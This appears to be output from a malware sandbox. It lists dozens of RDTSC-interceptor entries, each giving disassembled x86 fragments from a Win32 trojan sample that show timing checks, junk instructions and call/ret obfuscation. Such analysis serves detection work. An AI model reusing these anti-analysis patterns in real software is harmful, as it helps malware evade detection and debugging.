Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B1D511 second address: B1D53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jng 00007FABC9471C26h 0x0000000c jmp 00007FABC9471C2Dh 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 pushad 0x00000019 push edx 0x0000001a pop edx 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B1D53A second address: B1D559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jno 00007FABC90CD75Ch 0x00000011 jo 00007FABC90CD75Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B1EFF8 second address: B1EFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B1EFFC second address: B1F01A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FABC90CD75Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FABC90CD756h 0x00000013 jne 00007FABC90CD756h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B1F01A second address: B1F01E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AE1CBD second address: AE1CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Ah 0x00000007 jmp 00007FABC90CD763h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FABC90CD75Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B27174 second address: B27190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C36h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B26619 second address: B2661D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B268C0 second address: B268C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B268C6 second address: B268F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FABC90CD768h 0x0000000b popad 0x0000000c jl 00007FABC90CD770h 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007FABC90CD756h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B268F4 second address: B268F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B268F8 second address: B268FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B26EA5 second address: B26EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FABC9471C26h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2701A second address: B27049 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007FABC90CD756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d ja 00007FABC90CD78Ah 0x00000013 ja 00007FABC90CD767h 0x00000019 jmp 00007FABC90CD75Bh 0x0000001e jno 00007FABC90CD756h 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B28E88 second address: B28E93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FABC9471C26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B28E93 second address: B28EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FABC90CD761h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FABC90CD75Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B28EBE second address: B28F6E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FABC9471C31h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FABC9471C39h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 jmp 00007FABC9471C34h 0x0000001b jnc 00007FABC9471C3Ah 0x00000021 jmp 00007FABC9471C34h 0x00000026 popad 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b call 00007FABC9471C28h 0x00000030 pop ebx 0x00000031 mov dword ptr [esp+04h], ebx 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc ebx 0x0000003e push ebx 0x0000003f ret 0x00000040 pop ebx 0x00000041 ret 0x00000042 mov si, 1908h 0x00000046 jmp 00007FABC9471C2Eh 0x0000004b push A36640D9h 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FABC9471C2Ch 0x00000058 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B28F6E second address: B28F72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B293A9 second address: B293B4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B29B4A second address: B29B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], ebx 0x00000008 mov edi, dword ptr [ebp+122D2D7Ch] 0x0000000e push eax 0x0000000f pushad 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FABC90CD764h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2A069 second address: B2A06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2A06D second address: B2A072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2A6B7 second address: B2A6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2CC6E second address: B2CC72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2D74F second address: B2D753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2ED1A second address: B2ED2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC90CD75Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2F721 second address: B2F78F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FABC9471C28h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov esi, dword ptr [ebp+122D2D54h] 0x0000002a push 00000000h 0x0000002c cmc 0x0000002d movzx edi, bx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007FABC9471C28h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c mov dword ptr [ebp+1245AEB9h], edx 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push ecx 0x00000056 push ecx 0x00000057 pop ecx 0x00000058 pop ecx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2F78F second address: B2F795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2EA8C second address: B2EA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B2FF5F second address: B2FF7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FABC90CD767h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B34684 second address: B34688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B34688 second address: B3472A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push ecx 0x0000000c push ecx 0x0000000d jmp 00007FABC90CD768h 0x00000012 pop ecx 0x00000013 pop ecx 0x00000014 nop 0x00000015 call 00007FABC90CD765h 0x0000001a mov di, dx 0x0000001d pop ebx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FABC90CD758h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edi 0x0000003f call 00007FABC90CD758h 0x00000044 pop edi 0x00000045 mov dword ptr [esp+04h], edi 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc edi 0x00000052 push edi 0x00000053 ret 0x00000054 pop edi 0x00000055 ret 0x00000056 add bx, 6340h 0x0000005b or dword ptr [ebp+1245FA01h], edi 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B33816 second address: B3381A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3472A second address: B34730 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B34730 second address: B34736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B34736 second address: B3473A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B375A6 second address: B375AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B375AA second address: B375F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FABC90CD758h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D1E4Ch], edx 0x00000028 sub ebx, 48436E7Dh 0x0000002e push 00000000h 0x00000030 mov edi, 49840A2Ch 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jng 00007FABC90CD756h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B37871 second address: B3787E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FABC9471C2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3A626 second address: B3A6C8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FABC90CD758h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d ja 00007FABC90CD773h 0x00000013 nop 0x00000014 mov bx, C6B4h 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov edi, dword ptr [ebp+1247E105h] 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007FABC90CD758h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 clc 0x00000047 mov eax, dword ptr [ebp+122D06FDh] 0x0000004d cmc 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push ebx 0x00000053 call 00007FABC90CD758h 0x00000058 pop ebx 0x00000059 mov dword ptr [esp+04h], ebx 0x0000005d add dword ptr [esp+04h], 00000018h 0x00000065 inc ebx 0x00000066 push ebx 0x00000067 ret 0x00000068 pop ebx 0x00000069 ret 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FABC90CD75Ch 0x00000072 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3A6C8 second address: B3A6DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C32h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3A6DE second address: B3A6E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3D2B8 second address: B3D2BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3D2BD second address: B3D2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FABC90CD763h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3D2DC second address: B3D2E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FABC9471C26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3E2AD second address: B3E319 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FABC90CD756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c mov bx, cx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FABC90CD758h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b and bl, 00000064h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FABC90CD758h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a movzx edi, dx 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 js 00007FABC90CD75Ch 0x00000056 jo 00007FABC90CD756h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3E319 second address: B3E32D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c jl 00007FABC9471C2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3C44C second address: B3C451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3E4B2 second address: B3E4B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3C451 second address: B3C523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD765h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FABC90CD758h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edi, 30B7A5C0h 0x00000029 push dword ptr fs:[00000000h] 0x00000030 jmp 00007FABC90CD766h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c stc 0x0000003d mov eax, dword ptr [ebp+122D0651h] 0x00000043 push 00000000h 0x00000045 push ebp 0x00000046 call 00007FABC90CD758h 0x0000004b pop ebp 0x0000004c mov dword ptr [esp+04h], ebp 0x00000050 add dword ptr [esp+04h], 00000019h 0x00000058 inc ebp 0x00000059 push ebp 0x0000005a ret 0x0000005b pop ebp 0x0000005c ret 0x0000005d call 00007FABC90CD761h 0x00000062 sbb edi, 2F5DA718h 0x00000068 pop ebx 0x00000069 xor ebx, 41FE2919h 0x0000006f push FFFFFFFFh 0x00000071 call 00007FABC90CD769h 0x00000076 clc 0x00000077 pop ebx 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jg 00007FABC90CD758h 0x00000081 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3F3A5 second address: B3F3AB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3E4B6 second address: B3E4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3C523 second address: B3C557 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FABC9471C30h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FABC9471C3Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B3E4BC second address: B3E563 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FABC90CD75Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FABC90CD768h 0x00000010 nop 0x00000011 or di, BB77h 0x00000016 mov ebx, dword ptr [ebp+122D3432h] 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov dword ptr [ebp+122D3670h], eax 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 mov dword ptr [ebp+122D1ECCh], ecx 0x00000036 mov eax, dword ptr [ebp+122D10CDh] 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FABC90CD758h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 jng 00007FABC90CD756h 0x0000005c push FFFFFFFFh 0x0000005e push 00000000h 0x00000060 push ebx 0x00000061 call 00007FABC90CD758h 0x00000066 pop ebx 0x00000067 mov dword ptr [esp+04h], ebx 0x0000006b add dword ptr [esp+04h], 00000019h 0x00000073 inc ebx 0x00000074 push ebx 0x00000075 ret 0x00000076 pop ebx 0x00000077 ret 0x00000078 mov bl, F6h 0x0000007a push eax 0x0000007b push esi 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f popad 0x00000080 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B4142B second address: B41450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Dh 0x00000007 jmp 00007FABC9471C30h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B41450 second address: B41454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B41454 second address: B41458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B41C81 second address: B41C85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B42CF9 second address: B42CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B43E9A second address: B43EB0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FABC90CD758h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007FABC90CD75Eh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B42CFD second address: B42D07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FABC9471C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B47B04 second address: B47B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FABC90CD764h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: AD7898 second address: AD789C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B4CE23 second address: B4CE3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FABC90CD75Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
